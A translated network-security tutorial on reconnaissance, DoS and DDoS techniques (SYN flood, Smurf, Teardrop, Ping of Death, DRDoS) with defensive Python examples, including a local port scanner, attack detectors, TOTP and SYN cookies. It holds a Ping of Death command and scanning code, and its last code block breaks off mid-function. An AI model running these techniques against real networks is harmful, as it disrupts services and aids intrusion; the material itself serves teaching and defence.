
GAME OVER GROUP


Contents

Part I: Understanding network attacks
  I. Introduction to network attacks
  II. Threats affecting network security
  III. Attacking a computer network
  IV. Forms of network attack
  V. Some network attack techniques
Part II: DoS attacks
  I. What is a DoS attack?
     1. Purpose of a DoS attack
     2. Targets
  II. Types of DoS attack currently known and in use
  III. Some methods of defending against DoS
Part III: DDoS
  I. The concept of DDoS (Distributed Denial of Service)
  II. Phases of a DDoS attack
  III. Overview of the DDoS attack-network architecture
  IV. Classification of DDoS attack types
  V. Some characteristics of DDoS attack tools
  VI. Some DDoS tools
  VII. Anti-DDoS techniques
Part IV: (title not legible in the source)

Part I: Understanding network attacks

I. Introduction to network attacks

A network attack can be defined as any method, process or means used with malicious intent to try to compromise the security of a network. There are several reasons an individual or group might want to attack a company's network. The people who carry out network attacks are commonly called network attackers, hackers or crackers. Some of the kinds of malicious activity that attackers and hackers carry out are summarised here:
- Unauthorised use of user accounts and privileges
- Theft of hardware
- Theft of software
- Running code to damage systems
- Running code to damage or corrupt data
- Modifying stored data
- Stealing data
- Using data for financial gain or for industrial espionage
- Taking actions that prevent legitimate, authorised users from accessing network services and resources
- Taking actions that exhaust network resources and bandwidth

II. Threats affecting network security

1. Insiders
In some small and medium-sized businesses, critical business data or customer information is entrusted to a single person. This creates a dangerous "dependence on one authority". System and network logs and automated reports are not checked regularly by management, so data can leak over a long period without being detected.

2. No plan for handling risk
A company's computers and network constantly face security risks, from hardware failure and loss to attacks by hackers or viruses, all of which can damage data. Many small and medium-sized businesses have no policy for responding to a data leak and no recovery plan; most panic and start improvising once something happens.

3. Default settings left unchanged
Attackers today commonly work from files holding hundreds of thousands of default accounts (username and password) for network-connected devices, and use them to probe for login access to the network. If default accounts and settings are not changed, the attacker easily takes control of network resources.

4. Insecure home networks
In some small businesses, employees bring their own laptops into the office. Home networks usually have very weak security, or no protective settings at all. Those laptops can therefore be the source that spreads viruses and malware, or become intermediate zombies through which an attacker reaches the company network.

5. Lack of caution on public networks
A common trick is to set up a wireless access point with no password (unsecured), label it "Free Wi-Fi" and wait for naive users to connect. The attacker then uses a network sniffer to read whatever text company employees type and send out.

6. Lost mobile devices
Many businesses, including recently some large companies, have leaked important data through stolen laptops, lost mobile phones or USB flash drives. Data on these devices is rarely encrypted or password-protected, so whoever holds the device can read it easily.

7. Web server mistakes
Many businesses still pay no attention to which server hosts their website or how well it is secured. The company website then becomes easy prey for SQL injection attacks or botnets.

8. Indiscriminate web browsing
Not every office worker understands the dangers lurking on the Internet: malware, spyware, viruses, trojans and so on. They unknowingly visit unidentified websites, or are lured into clicking on sites the attacker has trapped, and the employee's computer becomes the door through which the attacker enters the company network.

9. Email carrying malicious code
Spam floods your mailbox with attractive subjects: love scandals, racy pictures, business offers. One wrong click and the machine immediately downloads malicious code that paves the way for a string of further malware to enter the computer.

10. Unpatched security flaws
More than 90% of attacks on network systems try to exploit already-known security flaws. Although vendors regularly ship patches as soon as a flaw is discovered, some businesses do not take regular patching seriously, leaving the flaws wide open to attack.

11. Some other risks
+ A zero-day vulnerability in Adobe software (Flash Player, Adobe Reader and Acrobat). This flaw was discovered in March 2011 and rated critical. It lets an attacker execute code and possibly take control of the system. Criminals embed the malicious code as a Flash (.swf) file inside PDF or Excel documents.
+ The Conficker worm appeared in Vietnam quite early and keeps producing new variants, becoming ever more dangerous. Millions of computers worldwide are estimated to be infected with Conficker and to have unknowingly become part of a botnet that hackers use to mount large-scale DDoS attacks.
+ A kind of malware is currently circulating that, once it infects a computer, takes control of the system and displays fake notifications. It targets machines running unlicensed Windows and offers an activation service; many consumers lost money calling the (attacker-chosen) phone number to obtain a Windows activation code.

12. Weaknesses in security
Understanding security weaknesses is essential for writing effective security policy, and helps secure the network before an attacker strikes. Cisco groups security weaknesses into three kinds: technology weaknesses, configuration weaknesses and policy weaknesses.

12.1) Technology weaknesses
Technical weaknesses include weaknesses in protocols, operating systems and hardware.
a) TCP/IP weaknesses: TCP/IP is a security weakness because it was designed as an open standard to make exchanging information easy. That is what made it so widely used, but it also makes it easy to attack, because almost everyone is familiar with how TCP/IP works. Two protocols in the TCP/IP suite that Cisco singles out as inherently insecure are SMTP (TCP) and SNMP (UDP). Typical attacks against them are IP spoofing, man-in-the-middle and session replay.
b) Operating system weaknesses: every operating system has weaknesses; Linux and Unix are considered to have fewer than Windows. In practice most users run some version of Windows.
c) Network equipment weaknesses: most network devices (servers, switches, routers) have security weaknesses, but a good configuration and installation policy for them greatly reduces the impact.

12.2) Configuration weaknesses
These are mistakes made by the administrator: unsecured user accounts, system accounts with easily guessed passwords, unsecured default configuration on devices, or misconfigured devices.
a) Unsecured user accounts: every account needs a username and password, but these are often transmitted across the network in clear text. A policy for protecting accounts (encryption, authentication) is needed.
b) System accounts with easily guessed passwords: another configuration weakness is an account whose password is easy to steal. To prevent this, the administrator should have a policy that no password is valid forever: every password must have an expiry date.
c) Misconfigured Internet services: some companies use real (public) Internet addresses for their hosts and servers. That makes it easy for an attacker to gather information about them. Using NAT or PAT solves this: private addresses let you number hosts and servers without using public addresses, while the public address is what the border router routes to the Internet.

... is not the optimal measure. The ports on the interface facing the Internet have to be open so that users can reach the Internet and traffic can come back, and that opening in the firewall is what an attacker can come through. Security can be added to the network by using conduits, which are basic secured connections; Cisco's Secure Private Internet Exchange (PIX) firewall is presented as the optimal measure for securing the network.
d) Unsecured default settings in products: many hardware products ship without a password, or with a default password, so that the administrator can configure them easily. That makes the job easier (some devices simply plug in and work), but it also makes attacking the network easier. A secure configuration policy should therefore be applied to every device before it is installed in the network.
e) Misconfigured network equipment: configuration errors on devices are holes that can be exploited: weak passwords, no security policy, or unsecured user accounts are all device configuration errors. The hardware and the protocols running on a device also open holes in the network; without a security policy for them, an attacker will exploit them. If you run SNMP with its default settings (the default community strings), information can be stolen easily and quickly, so make sure SNMP is disabled or its defaults are changed.

12.3) Policy weaknesses
The security policy describes how and where security is enforced; it is the key condition for security to be effective. Policy weaknesses include: absence of a written security policy, organisational politics, lack of business continuity planning, lax security administration, installations and changes that do not follow the stated policy, and no disaster recovery plan.


III. Attacking a computer network

1. Gathering information about the system
Information gathering can be split into two kinds.
+ Passive reconnaissance: according to seamoun, this could be given the tongue-in-cheek name "riding past the system to look at the flowers". This kind of gathering is a preliminary survey of the organisation: general information, geographic location, telephone numbers and email addresses of individuals and managers in the organisation, and so on. You may ask why on earth one would collect the telephone numbers and email addresses of people in the organisation. They are very useful when carrying out a social engineering attack (which seamoun will cover later).
+ Active reconnaissance: this kind collects information closer to the system itself, such as IP address (ranges), domains and DNS.
Note: all of this information gathering matters a great deal to the attacker, because it shows which paths into the system are the easiest to attack. It is like courting: go straight to "the girl" and you will surely lose. You first have to find out where she lives, how many brothers and sisters she has, what her parents are like, and learn her tastes through her close friends... (Wrong place for that, but this part is for the Southern brothers, who are surely better at it than seamoun.)
The information gathering process can be broken into 7 steps (the division is only approximate):
1: Gather initial information
2: Determine the scope of the network
3: Check whether hosts are "alive"
4: Discover open ports
5: Identify the operating system
6: Enumerate the services behind the open ports
7: Build a map of the network

2. Scanning
Scanning, or network scanning, is an indispensable step in an attacker's process of attacking a network. Done well, it quickly reveals flaws in the system, for example the Windows RPC flaw or flaws in web service software such as Apache. From those flaws the attacker can use malicious code (from various websites) to attack the system and, at minimum, obtain a shell. There are many scanning tools, both commercial (Retina, GFI) and free (Nmap, Nessus). Commercial versions can usually download new bug signatures from the Internet and so find newer flaws. Scanners also help the administrator find the system's flaws and suggest fixes, such as installing service packs or applying more sensible policies.
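Steps 3, 4 and 6 of the reconnaissance process above (is the host alive, which ports are open, which service answers) as a small TCP connect scanner with banner grabbing. This is an added example and not the report's own code; to run offline it starts its own listener on 127.0.0.1 and scans that, and the SMTP-style banner is constructed. A connect scan completes the TCP handshake, so it is the noisiest kind of scan and appears in the target's logs, which is exactly what an IDS keys on.

```python
"""TCP connect scan with banner grabbing against a constructed local target."""
import socket
import threading
from contextlib import closing


def tcp_port_open(host: str, port: int, timeout: float = 0.3) -> bool:
    """Full TCP connect (not a SYN/half-open scan): connect_ex returns 0 on success."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def grab_banner(host: str, port: int, timeout: float = 0.5) -> str:
    """Step 6: many services (SMTP, FTP, SSH) announce name and version on connect."""
    try:
        with closing(socket.create_connection((host, port), timeout=timeout)) as s:
            return s.recv(256).decode(errors="replace").strip()
    except OSError:
        return ""


def scan(host: str, ports) -> dict:
    """{port: banner} for every open port; an empty dict means nothing answered,
    which (absent ICMP) is as close as step 3 gets to 'host is alive'."""
    return {p: grab_banner(host, p) for p in ports if tcp_port_open(host, p)}


def start_fake_service(banner: bytes) -> int:
    """Constructed target: a listener on an ephemeral local port that greets each
    connection with the given banner. Returns the port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            with closing(conn):
                try:
                    conn.sendall(banner)
                except OSError:
                    pass            # the bare port probe closes without reading

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    target_port = start_fake_service(b"220 mail.example.test ESMTP ready\r\n")
    print(scan("127.0.0.1", [target_port]))
```

Against a real host you would hand `scan()` the address found in step 2 and a port list; Nmap does the same job with timing control, SYN (half-open) scans and service fingerprinting on top.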


3. Break in and gain control of the system
4. Maintain control of the system
5. Erase traces

IV. Forms of network attack

A. Network sabotage, based on the limited or non-recoverable nature of resources

1) Through connections
1.1: SYN flood: exploiting the way a TCP/IP connection is set up, the attacker starts establishing a TCP connection with the target but abandons it as soon as the SYN and SYN-ACK steps are done, leaving the target waiting (for the ACK from the requesting side) and retransmitting its SYN-ACK to finish the connection. Another way is to spoof the source IP address of the SYN packet; as above, the target is left waiting, and its SYN-ACK packets can never reach their destination because the source address does not exist. With this method an attacker can attack a network whose bandwidth is larger than the attacker's own.
2) Exploiting the resources the victim itself has:

2.1: Land attack: similar to SYN flood, but the attacker uses the target's own IP address as the source address of the packet, pushing the target into an endless loop trying to set up a connection with itself.
2.2: UDP flood: the attacker sends a UDP echo packet whose source is the loopback address of the target, or the address of another machine on the same network, to the target's UDP echo port (port 7), setting up a ping-pong of echo packets between the two machines (or between the target and itself, if it answers on loopback) that gradually uses up their bandwidth and hinders resource sharing for the other machines on the network.
3) Using bandwidth
3.1: DDoS (Distributed Denial of Service): a very dangerous method. The attacker breaks into many computers, installs remote-control programs on them, and triggers all of them at the same moment to attack a single target. Hundreds or even thousands of machines can take part at once (depending on the attacker's preparation), and together they can consume the target's bandwidth in an instant.
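Header checks for the connection-level patterns described in 1.1, 2.1 and 2.2: SYN flood (half-open connections that never get the final ACK), Land (source address equal to the target's own) and the UDP echo loop. This is an added example, not code from the original report; the packets are constructed in-line as plain records rather than captured traffic, and the field names are an assumption made for illustration.

```python
"""Detection logic for SYN flood, Land and UDP echo-loop packets."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str          # "tcp" or "udp"
    sport: int
    dport: int
    flags: str = ""     # TCP flag letters, e.g. "S" (SYN), "SA" (SYN-ACK), "A" (ACK)


# UDP services that answer every datagram they receive; two of them pointed at
# each other (or one at itself via loopback) exchange packets forever.
ECHO_PORTS = {7, 19}


def is_land(p: Packet) -> bool:
    """Land: a SYN whose source address is the target's own address."""
    return p.proto == "tcp" and "S" in p.flags and p.src == p.dst


def is_udp_echo_loop(p: Packet) -> bool:
    """UDP flood through the echo service: a datagram for port 7/19 whose source is
    loopback or another auto-replying port will bounce between two services."""
    if p.proto != "udp" or p.dport not in ECHO_PORTS:
        return False
    return p.src.startswith("127.") or p.sport in ECHO_PORTS


def half_open_per_target(packets, threshold: int = 50) -> dict:
    """SYN flood: per destination, count SYN flows that never received the
    client's final ACK. Returns {dst: half_open} for targets at or above threshold."""
    syns = defaultdict(set)
    acks = defaultdict(set)
    for p in packets:
        if p.proto != "tcp":
            continue
        flow = (p.src, p.sport, p.dst, p.dport)
        if p.flags == "S":
            syns[p.dst].add(flow)
        elif p.flags == "A":
            acks[p.dst].add(flow)
    return {dst: len(flows - acks[dst]) for dst, flows in syns.items()
            if len(flows - acks[dst]) >= threshold}


def classify(packets) -> dict:
    """What a detector would alert on for one batch of packets."""
    return {
        "land": sum(1 for p in packets if is_land(p)),
        "udp_echo_loop": sum(1 for p in packets if is_udp_echo_loop(p)),
        "syn_flood": half_open_per_target(packets),
    }


def constructed_sample():
    """Constructed traffic: 60 spoofed SYNs from 198.51.100.0/24 to 10.0.0.5:80 that
    are never completed, one legitimate handshake, one Land packet aimed at
    10.0.0.6 and one UDP echo-loop trigger."""
    pkts = [Packet(f"198.51.100.{i + 1}", "10.0.0.5", "tcp", 40000 + i, 80, "S")
            for i in range(60)]
    pkts += [Packet("192.0.2.10", "10.0.0.5", "tcp", 50000, 80, "S"),
             Packet("10.0.0.5", "192.0.2.10", "tcp", 80, 50000, "SA"),
             Packet("192.0.2.10", "10.0.0.5", "tcp", 50000, 80, "A"),
             Packet("10.0.0.6", "10.0.0.6", "tcp", 80, 80, "S"),
             Packet("127.0.0.1", "10.0.0.5", "udp", 7, 7)]
    return pkts


if __name__ == "__main__":
    print(classify(constructed_sample()))
```

The half-open count is the figure `netstat -an | grep SYN_RECV` shows on the victim; on a live link the same logic would run over a sliding time window rather than one batch, and the threshold would be tuned to the normal handshake rate of the server.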


4) Exploiting other resources
The attacker exploits resources the victim needs. By altering data and forcing the victim to copy the data it needs many times over, the attacker overloads the CPU and delays processing.
4.1: Smurf attack: this needs an important auxiliary, an amplifier network. The attacker sends an ICMP echo request to the amplifier network's broadcast address with the target's address as the source. Every machine on that network answers with an ICMP echo reply to the target. The target cannot process such a volume of traffic in time and easily hangs.
4.2: Teardrop: in a packet-switched network data is split into many packets, each carrying its own offset value, and they may travel different routes to the destination. At the destination the offset of each packet is used to put the data back together. Exploiting this, the attacker creates packets with overlapping offset values and sends them to the target. The target cannot put these packets in order and may hang, having spent all its processing capacity on them.

B. Sabotage by modifying control information
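Checks for the two attacks in 4.1 and 4.2 that abuse how IP itself works: Smurf (an ICMP echo request aimed at a network's directed-broadcast address, with the victim as spoofed source) and Teardrop (IP fragments whose offsets overlap, which a receiver must refuse rather than try to reassemble). This is an added example, not code from the original report. Offsets are given in bytes for readability (real IP headers count them in 8-byte units), and all packets and fragments are constructed.

```python
"""Directed-broadcast check (Smurf) and overlap-rejecting fragment reassembly (Teardrop)."""
import ipaddress


def is_smurf_trigger(src: str, dst: str, icmp_type: int, local_nets) -> bool:
    """True for an ICMP echo request (type 8) whose destination is the
    directed-broadcast address of one of our own networks: every host on that
    network would answer the (spoofed) source. Border routers should drop such
    packets rather than forward them onto the LAN."""
    if icmp_type != 8:
        return False
    dst_ip = ipaddress.ip_address(dst)
    return any(dst_ip == ipaddress.ip_network(net).broadcast_address
               for net in local_nets)


class FragmentReassembler:
    """Reassembles one datagram from (offset, payload, more_fragments) pieces.
    A fragment that overlaps data already held is rejected: that is the
    Teardrop pattern, and a naive copy into a buffer is where it did damage."""

    def __init__(self):
        self.pieces = {}    # offset -> payload
        self.total = None   # datagram length, known once the last fragment arrives

    def add(self, offset: int, payload: bytes, more: bool) -> None:
        if offset < 0 or not payload:
            raise ValueError("invalid fragment")
        end = offset + len(payload)
        for off, data in self.pieces.items():
            if off == offset and data == payload:
                return                      # exact retransmission: harmless
            if offset < off + len(data) and off < end:
                raise ValueError(f"overlapping fragment at offset {offset} (Teardrop pattern)")
        self.pieces[offset] = payload
        if not more:
            self.total = end

    def reassemble(self) -> bytes:
        if self.total is None:
            raise ValueError("last fragment not received")
        out = bytearray()
        for off in sorted(self.pieces):
            if off != len(out):
                raise ValueError(f"gap before offset {off}")
            out += self.pieces[off]
        if len(out) != self.total:
            raise ValueError("length mismatch")
        return bytes(out)


def reassemble_or_reject(fragments):
    """Returns (payload, None) for a well-formed set of fragments, or
    (None, reason) when the datagram must be dropped."""
    r = FragmentReassembler()
    try:
        for offset, payload, more in fragments:
            r.add(offset, payload, more)
        return r.reassemble(), None
    except ValueError as exc:
        return None, str(exc)


if __name__ == "__main__":
    print(reassemble_or_reject([(0, b"AAAAAAAA", True), (4, b"BBBBBBBB", False)]))
    print(is_smurf_trigger("203.0.113.9", "10.1.1.255", 8, ["10.1.1.0/24"]))
```

Modern stacks also cap the number of incomplete datagrams and the time they are held, because even well-formed fragments can be used to exhaust the reassembly buffer; that limit is a second check worth adding on top of the overlap rule.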

Exploiting insecure configuration (for instance, not authenticating the router update messages that are sent and received), the attacker changes important information, remotely or directly, so that legitimate users cannot use the service. Example: the attacker breaks into the DNS and changes its records, so that the DNS translation of domain names to IP addresses becomes wrong; clients asking for one domain are sent to another.

C. Physical sabotage or modification of hardware

The attacker exploits the access rights they hold over devices in the network (routers, switches) to reach and sabotage them.

V. Some network attack techniques

1) Reconnaissance attacks: the attacker first pings in order to find the target's IP address, then identifies the ports and services listening on that address. From this the attacker works out the type and version of the operating system, and proceeds to steal data or destroy the network's operating system. Attacks of this kind include: packet sniffers, port scans, ping sweeps and Internet information queries.

a) Packet sniffers: application software that uses a network adapter in promiscuous mode to capture every packet crossing a LAN. The technique only works within the same collision domain. Sniffers exploit information transmitted in clear text; clear-text protocols include Telnet, FTP, SNMP, POP and HTTP. Since such packets are not encrypted, anyone with a sniffer can read them. Countermeasures against packet sniffers: authentication, switched infrastructure, anti-sniffer tools and cryptography.

Authentication: commonly implemented with one-time passwords (OTPs). Two factors are involved: a personal identification number (PIN) and a token card, which authenticates a device or an application. The token card is a hardware device or a piece of software that generates a random-looking value (the password) at a point in time, typically every 60 seconds. The user combines that value with the PIN to form a unique password. If an attacker learns the password by sniffing, it is worthless, because it has already expired.
Switched infrastructure: this can be used to limit packet sniffing. For example, if the whole network uses Ethernet switches, the attacker can only see the traffic flowing to the host they are connected to. It does not stop sniffing entirely, but it reduces its reach.
Anti-sniffer tools: software and hardware designed to detect sniffers. They do not remove the risk completely but, like the other measures, they are one part of the whole system.
Cryptography: encryption keeps data from crossing the network in clear text. Even if an attacker captures the data, it cannot be decoded. This is more effective than hunting for and blocking the
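The two-factor one-time password described above (a token that changes every 60 seconds, combined with the user's PIN), with the token implemented as a software TOTP (RFC 6238, HMAC-SHA1) rather than a hardware card. This is an added example, not code from the original report. The shared secret, PIN and timestamps are constructed test values, and "PIN followed by the 6-digit token code" is an assumed format for how the card value and PIN are combined.

```python
"""PIN + time-based one-time password (RFC 6238) with server-side verification."""
import hashlib
import hmac
import struct
import time

STEP_SECONDS = 60   # the page says the token value changes about every 60 seconds
DIGITS = 6


def totp(secret: bytes, unix_time: int, step: int = STEP_SECONDS, digits: int = DIGITS) -> str:
    """RFC 6238: HMAC-SHA1 over the time-step counter, dynamic truncation
    (RFC 4226), then reduce to the requested number of decimal digits."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def one_time_password(pin: str, secret: bytes, unix_time: int) -> str:
    """What the user types: the PIN followed by the current token code (assumed format)."""
    return pin + totp(secret, unix_time)


def verify(submitted: str, pin: str, secret: bytes, unix_time: int, skew_steps: int = 1) -> bool:
    """Server side: recompute for the current step and +/- skew_steps of clock
    drift and compare in constant time. A value sniffed and replayed after the
    window has passed, or typed with the wrong PIN, does not match."""
    for k in range(-skew_steps, skew_steps + 1):
        expected = pin + totp(secret, unix_time + k * STEP_SECONDS)
        if hmac.compare_digest(submitted, expected):
            return True
    return False


def current_code(pin: str, secret: bytes) -> str:
    """Convenience for a live demo with the real clock."""
    return one_time_password(pin, secret, int(time.time()))


if __name__ == "__main__":
    SECRET = b"12345678901234567890"      # RFC 6238 test secret, constructed value
    print(one_time_password("4821", SECRET, int(time.time())))
```

A sniffed code is only good for the current step plus the configured skew; a production server would additionally remember the last step it accepted for the user, so that the same code cannot be replayed even inside that window.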

sniffer: if a channel is encrypted, whatever a sniffer captures is worthless, because it is not the original information. Cisco's encryption is based on IPsec, a tunnelling protocol that encrypts at the IP layer; the related protocols are Secure Shell (SSH) and Secure Sockets Layer (SSL).
b) Port scans and ping sweeps: these are done in order to: identify the services on the network; identify the hosts and devices running on it; identify the operating systems; and identify every weak point in the network, for use in further attacks. With a ping sweep the attacker gets a list of live hosts in an environment, then runs a port scanner over every port to produce a full list of the services on each host the sweep found. The next job is to pick the services with weaknesses and start attacking them. An IDS is used to warn the administrator of reconnaissance such as port scans and ping sweeps, so that the administrator can prepare to block the attacker.
c) Internet information queries: DNS queries reveal things like who owns a domain and which address ranges are assigned to it. The attacker uses them to scout for information. Together with port scans and ping sweeps, once enough is known (active ports, the protocols on those ports) the attacker examines the characteristics of those applications to find weaknesses and attack.
2) Access attacks
Here the intruder attacks the network to steal data, gain access, and obtain privileges for later access. Access attacks include:
Password attacks
Trust exploitation
Port redirection
Man-in-the-middle attacks

a) Password attacks: the attacker can break in using brute-force attacks, trojan horses, IP spoofing and packet sniffers. A brute-force attack is usually run with a program that works across the network and tries to log in to a shared resource. Once the attacker has access to a resource, they have the same rights as the user who shares it; if the resource is privileged enough, the attacker creates a back door for later access. The attacker may change the routing tables in the network so that every packet reaches the attacker before its final destination; in some cases the attacker can monitor all the traffic, truly becoming a man in the middle. Password attacks can be limited by:
Not allowing users to use the same password on several systems.
Disabling an account after a few failed logins, which prevents repeated password guessing.
Not using clear-text passwords: use OTP or encrypt passwords as described above.
Using strong passwords: at least 8 characters, with uppercase letters, lowercase letters, digits and special characters.
b) Trust exploitation: this exploits the trust relationships inside a network. Typically, if two domains trust each other, devices in one can access the other. The attacker exploits gaps in the trust relationship to compromise, that is take control of, systems. Systems outside the firewall should have no trust relationship at all with systems inside it.
c) Port redirection: another form of trust exploitation, which uses a compromised host to get traffic through the firewall. Picture a firewall with three interfaces, each connected to one host. The outside host can reach the public services host (the demilitarized zone, DMZ), and the public services host can

reach both the inside and the outside host. The attacker compromises the public services host and installs software on it that relays traffic from the outside host straight to the inside host. That relayed connection is not one the firewall policy was written to allow, yet it rides on paths the firewall already permits; the outside host thus gains a connection to the inside host by way of port redirection on the intermediate (public services) host.
d) Man-in-the-middle attacks: carried out with network packet sniffers and the routing and transport protocols. Their purposes: steal data; hijack a session; analyse network traffic; denial of service; corrupt the transmitted data. One example: an employee of an ISP who tries to get at every packet passing between the ISP and any other network. This attack can be countered by encryption: with the traffic encrypted in an IPsec tunnel, the attacker sees only meaningless information.


Part II: DoS attacks

I) What is a DoS attack?
A DoS (Denial of Service) attack is a very effective kind of attack: with it, one computer connected to the Internet is all you need to attack someone else's computer. In essence, the attacker occupies a large amount of the server's resources (bandwidth, memory, CPU, disk, and so on) so that the server can no longer answer requests from other machines (those of ordinary users), and the server may quickly stop working, crash or reboot.

1. Purpose of a DoS attack
Attempt to seize the network's bandwidth and flood the network, so that it can no longer provide other services to normal users.
Attempt to cut the connection between two machines and block access to a service.
Attempt to stop specific users from reaching a service.
Attempt to stop services from being reachable by anyone else.
When a DoS attack occurs, users of the service experience:
+ Disabled network
+ Disabled organisation
+ Financial loss

2. Targets the attacker commonly goes after in a DoS attack
As seen above, DoS occurs when the attacker uses up the system's resources and the system can no longer serve normal users. The resources commonly attacked are:
Creating scarcity in, limits on, or the non-renewal of resources: network bandwidth, memory, disk, CPU time and data structures are all DoS targets.
Attacking other systems that support the network, such as air conditioning, power, cooling and other company resources. Imagine the power to the web server being cut: can users still reach it?
Destroying or altering configuration information.
Destroying the physical layer or network devices such as power supplies and air conditioning.

II) Types of DoS attack currently known and in use:

1) WinNuke: this attack only works on computers running Windows 9x. The attacker sends packets carrying "Out of Band" data to port 139 of the target (port 139 is the NetBIOS port, and it accepts packets with the Out of Band flag set). When the victim receives them, a blue screen appears: Windows receives the packets but does not know how to react to Out of Band data, and the system crashes.
2) Ping of Death: simply send a very large packet through the ping command to the server and its system hangs. Example: ping -l 65000
3) Teardrop: all data sent across the network from source to destination goes through two steps: the source splits the data into fragments, each with its own offset value that fixes its position in the transmitted data, and when the fragments arrive the destination uses the offsets to put them back in the original order. Exploiting this, one sends the target a series of packets whose offset values overlap. The target cannot put them back together, loses control, and may crash, reboot or stop working if enough overlapping packets arrive.
4) SYN attack: the attacker sends the target a stream of SYN packets with non-existent source IP addresses. The target answers each with a SYN-ACK to the fake address and waits for the reply. Since the addresses do not exist, the target waits and waits, holding these pending "requests" in memory and wasting a considerable amount of server memory that should be used for other things. Send enough packets with fake addresses at once and the system is overloaded, crashes or reboots. ==> No fingerprints left behind.
5) Land attack: nearly the same as the SYN attack, but instead of fake IP addresses the attacker uses the victim's own IP address. This creates an endless loop inside the victim's own system: one side waits for a reply and the other side never sends one. ==> The victim clogs up.
6) Smurf attack: three parties are involved: the attacker (who gives the orders), the amplifier network (which obeys them) and the victim's system. The attacker sends ICMP packets to the broadcast address of the amplifier network, and the special thing is that these ICMP packets carry the victim's IP address as their source. When they reach the broadcast address, every machine on the amplifier network believes the victim sent them and all reply at once to the victim. The victim cannot bear that huge volume of packets and quickly stops working, crashes or reboots. So a small number of ICMP packets sent is multiplied many times over by the amplifier network; the amplification ratio depends on how many machines it has. The attacker's job is to capture as many networks or routers as possible that forward packets to the broadcast address directly, without filtering on the source address; with enough of them, a Smurf attack on the chosen target is easy. ==> One machine sends, many machines answer, and the target gives up.
7) UDP flooding: this attack needs two systems. The attacker makes their system enter a loop exchanging data over UDP, spoofing the source IP of the packets as the loopback address (127.0.0.1) and sending them to the victim's UDP echo port (7). The victim replies to the messages from 127.0.0.1 (itself) and ends up in an endless loop. Many systems, however, do not accept the loopback address, so the attacker instead spoofs the address of some machine on the victim's network and floods the victim with UDP. If this does not work, your own machine is the one that suffers.
8) DNS attack: the attacker can put an entry into the victim's DNS server pointing to a website of the attacker's choosing. When a client asks the DNS to translate the tampered name to an IP address, the DNS (whose cache the attacker has changed) returns the attacker's chosen address. Instead of the page they wanted, the victims land on the page the attacker created. A very effective denial of service!
9) Distributed DoS attacks (DDoS): DDoS needs at least a few attackers working together. First they break into poorly secured networks and install the DDoS server program on them. The attackers then agree on a time, connect with the DDoS client to those DDoS servers, and simultaneously order them to launch a DDoS attack on the victim.
10) DRDoS (Distributed Reflection Denial of Service): perhaps the most devastating, and the quickest way to make the target's machine reboot. It works like DDoS, but instead of attacking from many computers the attacker uses one computer and attacks through the large servers of the world. Still using the victim's IP address as a spoofed source, the attacker sends packets to the most powerful, fastest, best-connected servers (Yahoo and the like), and these servers send their replies to the victim's address. Receiving so many packets at once via these large servers quickly saturates the victim's link and crashes or reboots the machine. The danger of this method is that a single machine on an ordinary Internet connection can bring down any system, on the best link in the world, if it is not stopped in time. Our own website, HVA, was recently DoSed by this method.

III. Some methods of defending against DoS

DoS can cost a lot of time and money, so countermeasures are needed:
The system should be designed sensibly, avoiding excessive interdependence, so that a fault in one component does not bring the whole system down.
Set passwords to protect important devices and resources.
Require authentication from users and from information sources on the network (routing updates exchanged between routers should also be authenticated).
Build filtering on routers and firewalls, and a system to protect against SYN flood.
Accept only the services that are needed; temporarily stop services that have not been requested or are not in use.
Set quotas and limits for users, to prevent a malicious user from abusing the server's resources to attack the server itself or other networks and servers.
Continuously update, research and test to detect security holes, and fix them in time.
Monitor the system's activity continuously so that abnormal behaviour is noticed immediately.
Build a standby (backup) system.
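SYN cookies, the usual form of the "system to protect against SYN flood" in the list above: instead of allocating a half-open entry for every SYN (the memory the SYN attack in item 4 exhausts), the server encodes the connection's identity in the SYN-ACK sequence number and only creates state when the client's final ACK comes back carrying a valid cookie, so spoofed SYNs cost it nothing but a reply. This is an added example, not code from the original report. The layout (5-bit time, 3-bit MSS index, 24-bit MAC) follows the classic Bernstein/Linux scheme with simplified constants; the secret, addresses and packets are constructed.

```python
"""SYN cookie generation and validation, plus a stateless handshake simulation."""
import hashlib
import hmac

MSS_TABLE = [536, 1220, 1440, 1460]     # MSS values the cookie can encode
SECRET = b"constructed-server-secret"   # random and rotated in a real stack


def _mac24(src, sport, dst, dport, t, secret):
    """24-bit keyed hash binding the cookie to the 4-tuple and the time slot."""
    data = f"{src}:{sport}>{dst}:{dport}@{t}".encode()
    return int.from_bytes(hmac.new(secret, data, hashlib.sha256).digest()[:3], "big")


def make_cookie(src, sport, dst, dport, mss, now_minutes, secret=SECRET) -> int:
    """Server's initial sequence number for the SYN-ACK. No table entry is kept."""
    t = now_minutes & 0x1F
    idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    return (t << 27) | (idx << 24) | _mac24(src, sport, dst, dport, t, secret)


def check_cookie(src, sport, dst, dport, ack_number, now_minutes, max_age=2, secret=SECRET):
    """Validate the cookie carried in the client's ACK (our ISN + 1). Returns the
    negotiated MSS, or None if the MAC is wrong or the cookie is too old."""
    cookie = (ack_number - 1) & 0xFFFFFFFF
    t = cookie >> 27
    idx = (cookie >> 24) & 0x7
    if (now_minutes - t) & 0x1F > max_age or idx >= len(MSS_TABLE):
        return None
    if _mac24(src, sport, dst, dport, t, secret) != cookie & 0xFFFFFF:
        return None
    return MSS_TABLE[idx]


def handle_stream(packets, now_minutes, server=("10.0.0.5", 80)):
    """Process constructed (src, sport, flags, ack, mss) records as a SYN-cookie
    server would. Returns (syn_acks_sent, established) where established maps
    (src, sport) -> MSS; note that no half-open table exists at all."""
    established = {}
    syn_acks_sent = 0
    for src, sport, flags, ack, mss in packets:
        if flags == "S":
            make_cookie(src, sport, server[0], server[1], mss, now_minutes)  # goes out in the SYN-ACK
            syn_acks_sent += 1
        elif flags == "A":
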